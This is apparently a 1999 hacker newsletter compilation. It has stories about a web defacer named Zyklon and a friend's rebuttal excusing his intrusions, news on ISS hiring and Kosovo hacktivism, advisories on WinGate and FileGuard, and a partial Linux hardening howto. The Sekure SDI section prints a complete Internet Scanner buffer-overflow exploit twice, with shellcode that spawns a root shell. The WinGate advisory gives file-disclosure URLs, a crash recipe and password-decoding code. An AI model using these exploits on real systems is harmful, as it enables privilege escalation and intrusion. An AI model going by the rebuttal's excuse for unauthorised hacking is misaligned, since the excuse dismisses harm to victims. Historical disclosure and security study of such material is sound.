``Zyklon,'' ``0wn3d,`` ``hack'' and other words, scouring the Internet for other examples of Zyklon's destruction. He had been a very busy vandal. My searches showed he had hacked hundreds of Web sites in Canada, the U.S. and around the world, targeting such major government operations as NATO, the United States Information Agency and the 21st Century U.S. Government site, which is dedicated to ``transforming governments in the 21st Century.'' The targets varied from small interest groups to big government agencies. In some cases home pages had been changed to porn. In others Zyklon had created a greeting card to his hacker associates and in still others he had caused their Web page to be ``mirrored'' - electronically linked - to an anarchy site in Sweden. I learned that a certain U.S. state's Web site was so open, anyone who knew this could send out press releases posing as the state governor. A knowledgeable and determined hacker can access a Web server completely through a Web browser, the navigation program used to surf the Net. This ``exploit'' uses a back door (a login that bypasses security) to give access to the Web site's main computer server. Changing the company's site is as simple as typing in a single short command such as ``This site is 0wn3d by Zyklon'' to a Web page from the Web browser. A common attack is to create a program that will send the hacker your password then delete itself. It does its work by asking you to enter your password, just as you would do everyday. The way this would look is that the computer would say: ``Login,'' a prompt most computer users see on their screen at least once a day. You would then type in your computer access name, receiving back the message ``Incorrect Password.'' You would then retype your password, thinking you'd made a mistake the first time. What you would really have done is fed your password and login name to a hacker. I noticed that on some of the sites Zyklon had hacked there was mention of what looked to be a chat group, a place where computer users congregate online to gab, via a system called Internet Relay Chat (IRC). The tip-off was the electronic signature ``#pascal.'' It meant the chat group's name was ``Pascal,'' named after a computer programming language developed in the 1970s. I did a search of some common IRC groups - also called channels - and not only found Pascal, I also found Zyklon. He was the owner of the channel. When I entered his realm I was immediately tagged as coming from a site that he had hacked. My nickname that I had given myself for the chat was ``Roadkill'' - which I figured was appropriate, seeing as how Zyklon had tried to run me over. An automatic look-up called a ``bot'' - short for robot - told Zyklon who I was. It was the equivalent of walking through a metal detector. ``Heh, heh,'' he chortled, as I entered the chat group. Zyklon started bragging to his Pascal cronies about the information he had stolen from me. ``The Webmaster's password (at my company) is: ``getout! Ha, ha.'' I didn't rise to Zyklon's bait. I held back - ``lurking,'' as it's called - to see if Zyklon would further implicate himself. ``You got in?'' said another Pascal member, identified as ``Crystalin.'' ``Getout!'' he said, repeating my password. ``Laugh out loud! Someone's getting sick of me.'' ``Heh, heh,'' Crystalin chortled. ``What, did they see you?'' ``No, usually not,'' Zyklon replied. ``But they know when someone is there working their magic.'' ``You think Roadkill is snooping on us?'' Zyklon asked. ``Cause he found my eggy? (short for ``egg drop,'' another term for a hack attack). Or do you think he's just got a (corporate) address for no reason? Heh, heh.'' Zyklon turned to another Pascal member, named ``Fluxx.'' ``Fluxxy!'' he said. ``I think someone's trying to find me!'' I had just done my own look-up on him. Zyklon knew it, but I got the information I was looking for. I could see where he was logging in from. This told me what his Internet service provider was and the ID he was logged in as. This was telling exactly where he was on the Internet, although at this point I still didn't know his real name, or what city he was living in. ``Hey Roadkill,'' Zyklon said, addressing me directly. ``Go to your Web site.'' He wanted me to run a particular network utility that would look up his Internet address. I remained silent and waiting. ``Oh wait! I deleted it!'' Zyklon crowed, taunting me. He went on to admit that he had hacked my site. ``We just hack (he named my company again) all day, that's what we do. . . .'' Zyklon was crowing, but the victory was mine. I had located him and got him to admit his crime. I now had enough information to take this into a legal setting. I talked to a lawyer. The lawyer contacted the FBI computer crimes department. Unfortunately, after an initial interest, no one at the FBI seemed too interested. This lack of interest frustrated me. Victory was mine. I had located him and got him to admit his crime I even had trouble convincing people that they'd been hacked by Zyklon. Unless they could see the damage he'd actually done, they wouldn't believe me. One site operator wouldn't believe me until I read him his password file over the phone. I knew I had everything to nail Zyklon. I had the times and Internet location and address for him. By October, I had his real name and age. He was then 17 years old and living in the western United States. But there it lay for about three months. Early this year a close friend of mine contacted me and let me know that he was talking with an associate who had told him that his company had been hacked. Out of curiosity, he asked for the hacker's name. When he heard the name Zyklon bells went off. My friend remembered all the stories I had told him about my search. I sent my friend's contact an e-mail file with all the data I had on Zyklon. I did this in the hope it would finally stop him. Since I'd last checked on him, Zyklon had been busily hacking in Toronto, Florida, Japan, Los Angeles and many other cities and countries. My friend's friend discovered that a company in Florida was being hacked and sent them an e-mail warning them. Unfortunately, the Florida company was just trying to find out why their computers had crashed. He got a call back within hours. The FBI had been called in. They set up a trace on the company's Internet access and monitored all the Internet sessions. Zyklon was not quite finished with the site in Florida, but he soon would be. The FBI captured the full hacking session and Zyklon's Internet address, his electronic fingerprints. Last week, they moved in and arrested Zyklon. He is now being charged with computer crime offences. U.S. federal law allows every state a hacker passed through on the Internet to press charges. His computer equipment has been taken away. And apparently, his parents are really upset. Justice may be delayed, but when it comes it can be so sweet. John Howell is a computer systems expert. 28.1 Rebuttal by Fluxx; ~~~~~~~~~~~~~~~~~~ "The Untold Truth About Zyklon, The Security Specialist Trying To Make A Difference." Before I begin, let me introduce myself. I go by the name Fluxx. This article is a follow up to the article written by John Howell published on April 3rd. Clarification being the primary objective. The previous article contained a lot of what I like to call FUD (Fear, Uncertainty & Doubt) which usually comes from people lacking the proper information and/or knowledge. I have known "Zyklon" for 3 years now, and we are close friends. It sickens me to see some of the vicious slander that Mr. Howell spews out without knowing this to actually be fact. First of all, Zyklon was an alias he picked out a few years ago because it was catchy, not because he is some Nazi, like Mr. Howell describes him to be. Secondly, his goal is to educate network security administrators of the flaws that their servers are vulnerable to. As Mr. Howell so cleverly pointed out, it's hard to convince a company that they have been breached without them actually seeing the damage. What better way to prove it to a large company, other than to modify their corporate webpage? Sure, it still is illegal entry to computer systems, and some could also say damaging data, but that remains to be seen. I have seen countless system penetrations from Zyklon in the past, and he has always backed up their original html files, and patched their security vulnerabilities, another good point Mr. Howell declined to add. What I would also like to know is, why Mr. Howell is so proud of himself having "caught" Zyklon owning up to his "crimes" on IRC. Does he think IRC logs will stand up in court? I'm sorry to say my friend, they won't. There are many different kinds of hackers out there. Political Activist hackers who do it for a cause. Malicious hackers who do it to cause as much damage as they can, most commonly younger kids on a joy ride. Finally, you've got the average hacker who's curiosity gets the best of him, and all he strives for is to learn, secure and move on. Getting inside of a hackers head is a ride not many have the chance to take. Most commonly refered to as Generation-X techno kids, hackers are not always kids. I personally know hackers who are grandfathers. It has become a lifestyle in the 90's, and the world has finally come to realize that. As technology progresses faster and faster every day towards the year 2000, Internet and corporate network security tightens up ever so slowly. In most cases, that's thanks to people like Zyklon. The world wide web has become a huge medium for companies, and business is good. Customers appreciate stable tight security for their sites, they do not expect to pop up their webpage one Sunday morning and have happy faces all over it. Essentially, breaking down server security now, is the most efficient way in making people more aware of the rising threat. Classically, most webservers run or have access to some sort of cgi-bin directory, which contains many programs available to the advanced browsing user to issue remote commands to the internal server, to retrieve issued requests. Now for normal folk, they would never see these. They would have no need to see them, but for a hacker its the peephole staring directly into the soul of the machine. Mr. Howell also mentioned this, describing it as "a back door (a login that bypasses security) to give access to the Web site's main computer server". This is not entirely true. What occurs is the WWW server software has access levels it needs to fulfill to run one of the cgi-bin programs. A website that is on-line with one of the many vulnerable cgi-bin programs is now open to be exploited. This cgi-bin may be used to issue commands to the computer, remotely (not from the keyboard) to the operating system. A hackers light at the end of the tunnel, metaphorically speaking. Don't get me wrong, this isn't the only way hackers exploit systems. This is one (quite old technique) that STILL is vulnerable on thousands of machines spanning across the world. In the end, hackers will always be here, and like life has shown us, there are always good and bad points to every argument. Let us sit, and idly ponder why such brilliant computer specialists are not working for these large corporatations. Kinda makes you wonder what the current security administrators are doing, eh? Fluxx Born & Raised In Canada. @HWA 29.0 Atlanta based ISS seeks to hire hackers from Aussie land.. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Scoped via HNN http://www.it.fairfax.com.au/990406/networking/networking1.html Link The good, the bad, and the hackers By PHILIPPA YELLAND | LOOK! Up on the Internet. Is it the X Files? Is it Star Wars? Is it Ghostbusters? No, it's the X-Force. This offshoot of Internet Security Systems is looking to hire a good hacker (yes, there are such beings) to join its worldwide team dedicated to truth, justice, and uncovering new security risks. There's a thin line of bits and bytes between the good and the bad hackers, ISS's local managing director Steven Laskowski says. Some, like Star Wars' Darth Vader, choose to go over to the dark side and use their powers to bring down governments, multinationals, and corporations. Others, like Luke Skywalker, use their abilities in the service of ISS to warn subscribers of threats to their operating systems, applications and networks. Laskowski is searching for a very rare kind of person to join the elite band of hacker-busters. She or he must be ethical, endlessly patient, be very knowledgeable about systems and applications, understand computer architecture, and have been hacking for many years. ``We're looking for someone who can keep their finger on the pulse of the underground hacking community, yet who can look at applications to find their vulnerabilities,'' Laskowski says. ISS says that applications, particularly from Microsoft, are the new favorite for hackers. ``Bill Gates is targetted particularly because he's the antithesis of the hacker mentality,'' Laskowski says. When Laskowski finds a suitable local Jedi, she or he won't have to worry about splashing out on corporate suits and high heels. ``In our head office at Atlanta, X-Force team members' workmates include two snakes, one iguana, and three spiders,'' Laskowski says. ISS is already sending out warnings to corporate subscribers that solutions to the Y2K problem may become security issues themselves. ``Businesses are locking down apps so they're Y2K-compliant and this means there can be no patches. This is a hackers' bonanza. ``Second, Y2K is an industrial espionage minefield. Hackers are waiting until after 1 January 2000 to break in, knowing that the blame will be directed at the Y2K solution, not the hacker." Australia is increasingly important in The Empire. ISS's 25-year-old founder, Chris Klaus, is paying a physical - as opposed to a virtual - visit next month, and the X-Force's chief sweat shirt, Christopher Rouland, is beaming over in June. Steven Laskowski can be reached on slaskowski@iss.net @HWA 30.0 More on hacktivism from the Globe... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Link Electronic infiltration is burgeoning war zone of hackers worldwide By Patti Hartigan, Globe Staff, 04/03/99 B eavis and Butt-head, the cackling cartoon characters, stare out from a NASA Web page, their fists raised in a sort of virtual protest. These familiar figures from American popular culture are hardly the new image of the space agency: The site was ''hacked,'' or corrupted, yesterday by a group of Russian computer experts who posted the same message on a NATO Web site in Egypt. The hacked sites, signed ''From Russia With Love,'' are scrawled with a profane message denouncing NATO as well as a demand for allied troops to ''Go away from Kosovo.'' While the real war in the Balkans is waged on the ground and in the air, a virtual war is being fought in cyberspace. In the past few days, hackers on both sides of the conflict have been defacing Web sites with electronic graffiti and launching programs designed to slow down or crash their opponents' servers. On Wednesday, the NATO server in Belgium was bombarded with thousands of e-mail messages from Yugoslav hackers that overloaded its Web site. Another group, called ''Russian Hackers Union,'' defaced a US Navy site. Hacking groups in the United States and Europe are retaliating with their own graffiti. Team Spl0it, a coalition that includes an 18-year-old American hacker, broke into several Web sites and posted such antiwar slogans as, ''Tell your governments to stop the war.'' Hackers on the West Coast are trying to crack the Serb government site, although the server is said be extremely secure and based in London. And the Kosovo Hackers Group, a coalition of European and Albanian hackers, has erased at least five sites and replaced them with black and red ''Free Kosovo'' banners. In what is being called the first Internet war, hackers are emerging as electronic vigilantes. At the same time that governments are inundating the Internet with propaganda and individuals are using the medium to communicate, hackers have actually taken the battle into their own hands, performing military exercises with the click of a mouse. It's called ''hacktivism,'' the marriage of computer hacking and political activism. This form of protest has been around since 1995, when hackers became politicized to support convicted hacker Kevin Mitnick. Most electronic civil disobedience is illegal in the United States, but this is the first time it has been employed during an international conflict, and there is no precedent that governs such conduct. Michael Vatis, chief of the FBI's National Infrastructure Protection Center, said through a spokesman yesterday that he had no comment on the recent rage of hacktivism. In past international conflicts, governments have successfully disrupted the telecommunications systems of their opponents. But in the age of the Internet, this is the first time that private citizens have been able to jump into the fray. ''This is the harbinger of things to come,'' said Barry Steinhardt, former president of the Electronic Frontier Foundation and associate director of the American Civil Liberties Union. ''It's a free and open network. Parts of it are sealed off, but it's a porous network. It's inevitable that you're going to get vigilantes acting in an extralegal way.'' Hackers have traditionally objected to attempts to curtail free speech, and American hackers are outraged by Serb government censorship. One member of Team Spl0it, an 18-year-old resident of the East Coast who goes by the handle f0bic said in an e-mail message that he and others decided to take action a few weeks ago. ''I, along with the rest of my team, decided to get the message out on the Internet,'' he wrote. ''Our message was bright and clear: Stop the war before we go to World War III.'' The Globe has confirmed his existence, but he asked that his name not be used. In the past, the Electronic Frontier Foundation, a leader in Internet policy, has contended that hacktivism is illegal and can be neither encouraged nor condoned. But that may change in an international conflict. ''We may want to reevaluate that in light of the historical importance that civil disobedience has played as a means of protest,'' said Alex Foster, the foundation's director of public affairs. ''Does hacktivism change in a crisis situation? I don't have an answer on that yet.'' Foster warned that ordinary citizens who are using the Internet to communicate their own political opinions legally should be careful, though. ''People in Serbia who are using the Internet for normal things like sending e-mail may be putting themselves at great risk,'' he said. But US and Russian hacktivists continue their cyberwar unconcerned about repercussions. ''We are activists because we see there are wrongs that need to be corrected,'' f0bic wrote. This story ran on page A02 of the Boston Globe on 04/03/99. © Copyright 1999 Globe Newspaper Company. @HWA 31.0 WinGate 3.0 problems ~~~~~~~~~~~~~~~~~~~~ Date: Mon, 5 Apr 1999 17:52:51 -0700 From: Marc To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: Multiple WinGate Vulnerabilities[Tad late] At first we were just going to post this advisory to our website but after the subject came up on the NTSEC list and we got a few emails telling us to post it to the other lists... well here it is. Signed, Marc eEye Digital Security Team http://www.eEye.com P.S. Go see Matrix. ________________________________________________________________________ eEye Digital Security Team www.eEye.com info@eEye.com February 22, 1999 ________________________________________________________________________ Multiple WinGate Vulnerabilities Systems Affected WinGate 3.0 Release Date February 22, 1999 Advisory Code AD02221999 ________________________________________________________________________ Description: ________________________________________________________________________ WinGate 3.0 has three vulnerabilities. Read any file on the remote system. 1. Read any file on the remote system. 2. DoS the WinGate service. 3. Decrypt WinGate passwords. ________________________________________________________________________ Read any file on the remote system ________________________________________________________________________ We were debating if we should add this to the advisory or not. We figured it would not hurt so here it is. The WinGate Log File service in the past has had holes were you can read any file on the system and the holes still seem to be there and some new ways of doing it have cropped up. http://www.server.com:8010/c:/ - NT/Win9x http://www.server.com:8010// - NT/Win9x http://www.server.com:8010/..../ - Win9x Each of the above URLs will list all files on the remote machine. There are a few reasons why we were not sure if we were going to post this information. By default all WinGate services are set so that only 127.0.0.1 can use the service. However the use for the log file service is to let users remotely view the logs so therefore chances are people using the log file service are not going to be leaving it on 127.0.0.1. Also by default in the WinGate settings "Browse" is enabled. We are not sure if the developers intended the Browse option to mean the whole hard drive. We would hope not. The main reason we did put this in the advisory is the fact that the average person using WinGate (Cable Modem Users etc..) are not the brightest of people and they will open the Log Service so that everyone has access to it. We understand there are papers out there saying not to do this and even the program it self says not to, but the average person will not let this register in their head as a bad thing so the software should at least make it as secure as possible. Letting people read any file is not living to that standard. Any way, lets move on... ________________________________________________________________________ DoS the WinGate Service ________________________________________________________________________ The Winsock Redirector Service sits on port 2080. When you connect to it and send 2000 characters and disconnect it will crash all WinGate services. O Yippee ________________________________________________________________________ Decrypt the WinGate passwords ________________________________________________________________________ The registry keys where WinGate stores its passwords are insecure and let everyone read them. Therefore anyone can get the passwords and decrypt them. Code follows. ________________________________________________________________________ // ChrisA@eEye.com // Mike@eEye.com #include "stdafx.h" #include #include main(int argc, char *argv[]) { char i; for(i = 0; i < strlen(argv[1]); i++) putchar(argv[1][i]^(char)((i + 1) << 1)); return 0; } ________________________________________________________________________ You get the idea... It is good that WinGate 3.0 by default locks down all services to 127.0.0.1. However, there still seems to be holes were if one gets access to the WinGate service, non-blocked ip, they can do some damage. Chances are if you poke hard at some of the other services you will find similar problems as above. Software developers need to remember that the avg. user is not all ways the brightest so our products security must be as tight as possible. ________________________________________________________________________ Vendor Status ________________________________________________________________________ Contacted a month or so ago, have heard nothing. Someone from the NTSEC list contact eval-support@wingate.net with our findings and they were sent an email back rather quickly. We had sent our emails to support@wingate.net and things of the such. Maybe all three of our emails just got lost. The last we've heard WinGate is taking steps to fix the problem. Look for patches soon. ________________________________________________________________________ Copyright (c) 1999 eEye Digital Security Team ________________________________________________________________________ Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please e-mail alert@eEye.com for permission. ________________________________________________________________________ Disclaimer: ________________________________________________________________________ The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. Please send suggestions, updates, and comments to: eEye Digital Security Team info@eEye.com http://www.eEye.com @HWA 32.0 Sekure team releases problems found with ISS-scanner including rewt sploit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Sekure SDI http://www.sekure.org --------------------------- Brazilian Information Security Team -> Internet Scanner Buffer Overflow <- (SDI.03-99.iss-scanner) --- complexity : medium critical level : medium --- 1. Introduction Internet Scanner (I.S) is a wide known tool to audit the security level of a certain network. It has a database which will assist in the detection of the commom security holes that may help an intruder to gain access or gather private information from the scanned host. During the checks, I.S. will run a set of procedures that requires privileges in the local host (root), so an ordinary user may not start a scan. Altough it's not the default configuration, it's commom, in certain cases, to set the suid bit to permit "root privileges" so the "audit" user, who does not have the necessary privileges, may execute a scan. A certain problem was found in the IS program during some tests in our lab. While by default it will not represent a thread, in the above situation (suid bit owned by root), it will become a security gap. 2. I.S Flaw Internet Scan does not check bounds in some arguments it receives from the command line, which will cause a segmentation fault. sekure:~$ ./iss -D `perl -e "print 'A' x 2000"` Creating Directory /usr/local/iss/scans/s.199903241212 # Time Stamp(2103): Signal - Segmentation Violation: (...) (..) ISS Scan was interrupted. Segmentation fault sekure:~$ ./iss -c `perl -e "print 'A' x 2000"` (...) Segmentation fault Let's check the return address: (gdb) run -D `perl -e "print 'A' x 2000"` Starting program: iss -D `perl -e "print 'A' x 2000"` (...) Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () (gdb) In this situation, we can reach the return address (which holds the place the program must return in the memory), so we may execute arbitrary commands, and adding the "suid bit" situation, it will be executed with root privileges. 3. Who is vulnerable ? If you are running I.S using the SETUID bit to conceed root privileges to an ordinary user, then you ARE vulnerable to this attack. If you are using the DEFAULT configuration of I.S, you are NOT vulnerable. 4. Fixing the situation The ISS which is the owner of I.S does not provide the source code along with the program, so we may not provide a quick patch. We advice you to remove the suid bit and contact the vendor for a correction. We also advice you to avoid the use of suid bit unless you are familiar with the purpose of the program. 5. Exploiting the bug We believe information must be free available. If we don't provide the exploit script along with the information, someone else will do. We also know that people like to see with their own eyes to believe they are vulnerable. So here it is: ------------- SDI-iss.c ----------------------------- /* * Sekure SDI - http://www.sekure.org * Brazilian Information Security Team * By c0nd0r * * . ..Internet Scanner (ISS) Buffer Overflow.. . * (read the original advisory at http://www.sekure.org/advisory.html) * * > This may not represent a thread if you are * > NOT using IS with setuid root * * This code is only for educational purposes. * ------------------------------ * Instructions: After the compilation, execute it to get * a shell prompt with the $EGG in the environment. * tiazinha:~$ SDI-iss * bash$ ls -tarl iss * -rwsr-xr-x 1 root daemon 1691180 Dec 10 15:22 iss* * bash$ ./iss -c $EGG * * Creating Directory /usr/local/iss/scans/s.199903261158 * id; * uid=666(condor) gid=100(deejay) euid=0(root) groups=12(mail) * ------------------------------- * PS: the i/o descriptors are used by IS (stdin/stdout) as this is * just an example, I'll not worry about. */ char shellcode[]= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; #define ISS_HOME "/usr/local/iss" main ( int argc, char *argv[]) { char buff[2048], env[250]; long addr; int x, y, offset=0, src; if (argc > 1) offset = atoi(argv[1]); for ( x = 0; x < (238-strlen(shellcode)); x++) buff[x] = 0x90; for ( y = 0; y < strlen(shellcode); y++, x++) buff[x] = shellcode[y]; addr = (long) &src + offset; printf ( "SDI I.S. Exploit Code\n"); printf ( "4 educational purpose only\n"); printf ( "Please, go to ISS directory and run:\n"); printf ( "./iss -c $EGG\n\n"); /* the program mess with the stack so I prefer to set it by my own hands, no prob, just a little bit different */ buff [x++] = 0x60; buff [x++] = 0xef; buff [x++] = 0xff; buff [x++] = 0xbf; /* it works fine in my slak3.5 box */ buff[strlen(buff)] = '\0'; snprintf ( env, sizeof(env), "ISS_HOME=%s", ISS_HOME); putenv ( env); bzero ( &env, sizeof(env)); snprintf ( env, sizeof(env), "EGG=%s", buff); putenv ( env); system ( "/bin/sh"); } --------------------- eof ------------------ 6. Contacts Sekure SDI http://www.sekure.org info@sekure.org This advisory has been written by SSC (Sekure SDI Secure Coding Group) http://ssc.sekure.org securecode@sekure.org Subscribe the Best of Security Brazil - mailing list http://bos.sekure.org bos-br-request@sekure.org (the main language is portuguese but everybody is welcome) ---- written by c0nd0r condor@sekure.org -condor www.sekure.org s e k u r e pgp key available at: http://condor.sekure.org/condor.asc @HWA The rewt sploit; /* * Sekure SDI - http://www.sekure.org * Brazilian Information Security Team * By c0nd0r * * . ..Internet Scanner (ISS) Buffer Overflow.. . * (read the original advisory at http://www.sekure.org/advisory.html) * * > This may not represent a thread if you are * > NOT using IS with setuid root * * This code is only for educational purposes. * ------------------------------ * Instructions: After the compilation, execute it to get * a shell prompt with the $EGG in the environment. * tiazinha:~$ SDI-iss * bash$ ls -tarl iss * -rwsr-xr-x 1 root daemon 1691180 Dec 10 15:22 iss* * bash$ ./iss -c $EGG * * Creating Directory /usr/local/iss/scans/s.199903261158 * id; * uid=666(condor) gid=100(deejay) euid=0(root) groups=12(mail) * ------------------------------- * PS: the i/o descriptors are used by IS (stdin/stdout) as this is * just an example, I'll not worry about. */ char shellcode[]= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; #define ISS_HOME "/usr/local/iss" main ( int argc, char *argv[]) { char buff[2048], env[250]; long addr; int x, y, offset=0, src; if (argc > 1) offset = atoi(argv[1]); for ( x = 0; x < (238-strlen(shellcode)); x++) buff[x] = 0x90; for ( y = 0; y < strlen(shellcode); y++, x++) buff[x] = shellcode[y]; addr = (long) &src + offset; printf ( "SDI I.S. Exploit Code\n"); printf ( "4 educational purpose only\n"); printf ( "Please, go to ISS directory and run:\n"); printf ( "./iss -c $EGG\n\n"); /* the program mess with the stack so I prefer to set it by my own hands, no prob, just a little bit different */ buff [x++] = 0x60; buff [x++] = 0xef; buff [x++] = 0xff; buff [x++] = 0xbf; /* it works fine in my slak3.5 box */ buff[strlen(buff)] = '\0'; snprintf ( env, sizeof(env), "ISS_HOME=%s", ISS_HOME); putenv ( env); bzero ( &env, sizeof(env)); snprintf ( env, sizeof(env), "EGG=%s", buff); putenv ( env); system ( "/bin/sh"); } @HWA 33.0 FileGuard crack, security vulnerabilities. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ___________________________ / / / /\ ______/ ____/ ____/ / / / / / / ____/ / / /____ / ____/ / / / / / / / / / / /_/_/_/________/________/________/ / \_____\________\________\________\/ / . ../Macintosh Security/.. . / /________________________________/ Presents: Security Holes In FileGuard 3.0.8 Table Of Contents: - Introduction - Gaining Full Access - Launching The Cracked FileGuard Application - Password Protected Volumes - Disclaimer - End notes --==< Introduction >==-- By far FileGuard is the best protection software for the Macintosh OS. To a start it disables the debugger at operations when an attack could be expected. So it's pretty difficult to find out what algorithm it uses to encrypt the passwords. Not impossible but not as easy as in various other protection software for the Mac. Lets start with analyzing what FileGuard can do to protect a computer. Well, the appropriate question is more like, what FileGuard CAN'T do? It can protect volumes, it can encrypt files, it can password protect applications, it can limit access to files/ folders, etc... And it does not have the weaknesses that other security programs have. Such as "emergency passwords" or the letting the user remove extensions with use of programs such as FileBuddy. Shift disable works but is useless if the hard disk is password protected. --==< Gaining Full Access >==-- So this is nice and all, as long as only the administrator can change the various access settings. But what happens if the attack comes from the most unexpected place? The FileGuard application itself. This is the application that allows the administrator to change the settings to the various protection facilities. Naturally it's protected. It only launches if the administrator's password is entered. However this password protection can easily be cracked. And once it's cracked - meaning that it'll accept any password as the admin password - then anyone can do the changes to the settings that an admin could do. --==< Launching The Cracked FileGuard Application >==-- Launching the cracked application might actually prove to be a problem depending on how limited the user's access to the computer is. The easiest way to launch the cracked FileGuard app is through a user account with the authority to copy and launch applications. Then the FileGuard application can be copied onto the computer and launched from there. However, a system is still vulnerable if the user is not allowed to copy applications. If the user has enough access to launch applications from floppy disks then the cracked FileGuard app can simply be copied to a disk and launched from there. This method can be exploited through the guest account (if the guest account is enabled). The access to the computer using a guest account might be rather restricted. For example, floppy disks might not be allowed to be inserted into the computer. However, users will still be able to insert CDs and if it has a copy of the cracked FileGuard app on it then can be launched from there. --==< Password Protected Volumes >==-- I remember how once my computer teacher locked the HD on his computer with FileGuard and something happened to the password. He spent hours on the net before he found out some way of bypassing this problem. The only way available until now was to install a new driver onto the hard drive. Unfortunately this corrupts the disk. Highware has designed a program for situations such as this called EmergencyRemove. EmergencyRemove can be used to remove the drive-protection in emergency situations. However, even EmergencyRemove requires the appropriate password to be entered in order for the protection to be removed. And this is where the security hole is; by cracking EmergencyRemove so that it'll accept any password anyone can remove the volume protection from any protected disk. NOTICE: I have not actually tried password protecting my hard disk. So I don't actually "know" whether this method works on hard drives. I did, however, try this method on floppy disks and each attempt was successful. --==< Disclaimer >==-- These security holes are very real and may be exploited for "damaging" purposes. The objective of this text file was NOT to encourage such behavior but simply to point out the existing security holes of FileGuard 3.0.8. Therefore, neither mSec nor any of it's past, current or future members will take any responsibility for any kind of damage that may occur of any direct or indirect use of the information provided. --==< End Notes >==-- Two patches have been included with this text file as examples of how FileGuard and EmergencyRemove can be exploited. These security holes were found by mSec. If you are interested in finding out more about mSec please visit our homepage at: www.msec.net. You can also reach us and chat with the members on our Hotline server at: msec.net. This text file was put together by ProZaq. If you have any questions or comments my e-mail address is: prozaq@usa.net http://www.msec.net/texts/texts/FileGuard_308_Holes.txt @HWA 34.0 Linux system administration mini-howto by Pestilence ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Release Date : 6th April 1999 Previous Versions: none Linux Mini Administration HOWTO. By Kostas Petrakis aka Pestilence. This was written mostly as a small guide to some NT based co-workers here at my work so that they could check a few stuff on Linux systems if needed. Also i decided to write this because there are lots of administration howto's out there which are also kinda old. This paper in not a super-detailed paper, for this purpose there are other papers mentioned in the end of this HOWTO. This paper was intented to give a small clue of what people should check before they decide to allow services to run on their systems, or fully connect to the Internet. More and more people everyday connect their systems to the Internet, and more people are seriously thinking of buying either a leased line, or a cable modem and stay 24-7 on-line. There are allot of systems on-line some of them are tight secured, and others are openwide yelling to be hacked. This text is intented to give a small idea of what someoone should check at his system before he goes on-line, or what to secure once he is on-line. SERVICES Many servers over the Internet offer a wide of services to their users and customers, what comes here is a big risk since time has prooved that allot of services are usually buggy and easily exploitable providing root access, or other kinds of access to remote or local users. An administrator of either a home system, or a company, should be able to keep on track of this bugs and try to keep his software as more up to date as he can. This can be done by subscribing to several security mailing lists, such as Bugtraq, or Cert (Links included in the end of this document). Another major issue on services are the configurations of each service. Services usually follow a "guideline" of operation, which is usually declared in the configuration section of each service. Most buggy services have prooved to be: sendmail, web servers, ftp servers, and generally all services that have to do with interaction between the user and the file system. People oftenly like to bypass the configuration of services, and like to leave them the way they where installed, without even taking a look at what configurations are offering, this is a major mistake oftenly found to Junior administrators, or newcomers to the Unix world. WEB SERVERS Web servers keep their configuration files under the directory /etc/httpd/conf (default installation from the Linux distribution, which we encourage you to update to the most recent), or to /usr/local/apache/conf if recompiled, and you leave the paths intact. Take a good look at the configuration, sometimes you will see it has entrys you wouldn't want to, the one you should surely check is under what user does httpd operate, make sure httpd runs under user:nobody and group:nobody. Check that the log directory is not user writable, you dont want users "playing" with your log files now do you?. The biggest security thread though lately with httpd, is it's CGI's. CGI's are small programs written either in perl, or C, which are used by the webserver, and are usually the most dangerous. CGI's if coming from some unknown or not that reliable source should be checked for possible problems in their code which would risk the security of your webserver. The security risks a CGI could possibly create are the following: 1) Expose Information of your Webserver and its local filesystem/ users. 2) Search Scripts are the most dangerous, since a small missconfiguration, would allow remote users to search your entire filesystem, and reveal high risk information to them. Even if you dont run your webserver as root, you still have chances to run in big trouble. Try not to give access to users (if you allow user webpages, or have virtualhosts) to their cgi-bin directories, instead let them mail you and ask you to check a cgi script they want to use, or even better give them a list of CGI's they can use, that you trust. Avoid suid privilleged scripts, they are high risk and there is rarely the need for a script to be under such privilleges. Try to have scripts that validate the contect submmited by forms, validation of data is a more secure way to control what is being passed to your system. Avoid scripts that will allow remote systems to use them (Matt's scripts allow this feature). And finally avoid all scripts that have to do with web interfaces on services...this scripts usually are of super high risk! More on web security can be found following the links below. FTP FTP servers, are another high Risk on systems, generally it would be wise to avoid the use of FTP if there is no need, or if there is a need you should avoid having anonymous ftp enabled. FTP servers are used for file transfers between hosts. More oftenly they are used to give users of systems access to their websites. If you are from the persons that love, or like to contribute to the Linux community either with having a public ftp server offering mirroring services, or using the ftp server to release your software you should be very carefull, of what you give, and what you allow remote users to have. The default ftp daemon that comes with the Linux installation is wu-ftp, this server is simple, and good, but unfortunately several bugs where discovered, and it seems updates are not that often to it. So i recommend the use of a more advanced FTP server, which will allow you to have more detailed configuration files. One ftp server i like allot and use oftenly is ProFTPd, this server has an apache like configuration file, and allows the admin to have full control over it. Its widely used on major sites such as Linuxberg, Freshmeat, it updates frequently and they have a very good responce time over bugs found on it. It's site offers a very good documentation, and the configuration of it is really easy even from the average users who want to give partial access to remote users. It can run as a standalone daemon, or through inetd with the use also of tcp-wrappers. For instance lets have a look how ProFTPd is configured to allow remote users to upload to a directory, but deny them to download from that dir (good to deny warez usage of your ftp 